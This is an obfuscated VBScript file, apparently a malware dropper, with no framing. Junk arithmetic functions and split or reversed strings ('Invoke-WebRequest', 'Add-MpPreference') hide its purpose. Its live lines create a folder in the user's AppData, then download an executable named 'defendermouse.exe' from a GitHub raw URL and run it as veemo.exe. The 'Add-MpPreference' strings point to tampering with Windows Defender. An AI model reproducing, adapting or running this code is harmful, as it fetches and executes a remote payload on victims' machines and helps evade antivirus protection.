Function dwqeqwnassq(s)
	dwqeqwnassq = Replace(s, "%GGb2", StrReverse("ecneref" + "erPpM-ddA"))
End Function 

Function dqwe1dasd1(s)
	dqwe1dasd1 = Replace(s, "%qwe12", StrReverse("tseuqe" + "RbeW-eko" + "vnI"))
End Function 

Function hh887c1123c(s)
	hh887c1123c = Replace(s, "%hhj123", "pi" + "ng" + " 127.0.0.1")
End Function 

Function hjduy8nb123(dw)
   x = dw+3
   y = 5+12+dw-7/1
   ab = x+y / 1124
   x = ab + 33 / dw
   hjduy8nb123 = x + y / ab * dw
End Function

Set WshShell = CreateObject("WScript.Shell") 
WshShell.Run "cm" + "d /c m" + "kdir %USERPR" + "OFILE%\AppData\" + "Local\uyu" + "ydbbqdygxz" , 5 + 5 + 91 - 51 - 50
WshShell.Run "cm" + "d /c power" + "shell.exe invoke-web" + "request -uri https://github.com/krishnatherock9673/krishnamouse9673/raw/main/defendermouse.exe -out" + "file %USE" + "RPROFILE%\Ap" + "pData\Local\uyuy" + "dbbqdygxz\veemo.exe;%USERPROF" + "ILE%\AppData\Lo" + "cal\uyuydb" + "bqdygxz\veemo.exe", 5 + 5 + 91 - 51 - 50

Function dsadqweqwe(s)
	dsadqweqwe = Replace(s, "%GGb2", StrReverse("ecneref" + "erPpM-ddA"))
End Function 

Function fqehqwwqeq(s)
	fqehqwwqeq = Replace(s, "%qwe12", StrReverse("tseuqe" + "RbeW-eko" + "vnI"))
End Function 

Function dqwdqwdqwwq(s)
	dqwdqwdqwwq = Replace(s, "%hhj123", "pi" + "ng" + " 127.0.0.1")
End Function 

Function ggrwngwer(dw)
   x = dw+3
   y = 5+12+dw-7/1
   ab = x+y / 1124
   x = ab + 33 / dw
   ggrwngwer = x + y / ab * dw
End Function


Function fjeqwqeweqweqo(s)
	fjeqwqeweqweqo = Replace(s, "%GGb2", StrReverse("ecneref" + "erPpM-ddA"))
End Function 

Function mujvurwmiew(s)
	mujvurwmiew = Replace(s, "%qwe12", StrReverse("tseuqe" + "RbeW-eko" + "vnI"))
End Function 

Function nueqwuqgyubdyu(s)
	nueqwuqgyubdyu = Replace(s, "%hhj123", "pi" + "ng" + " 127.0.0.1")
End Function 
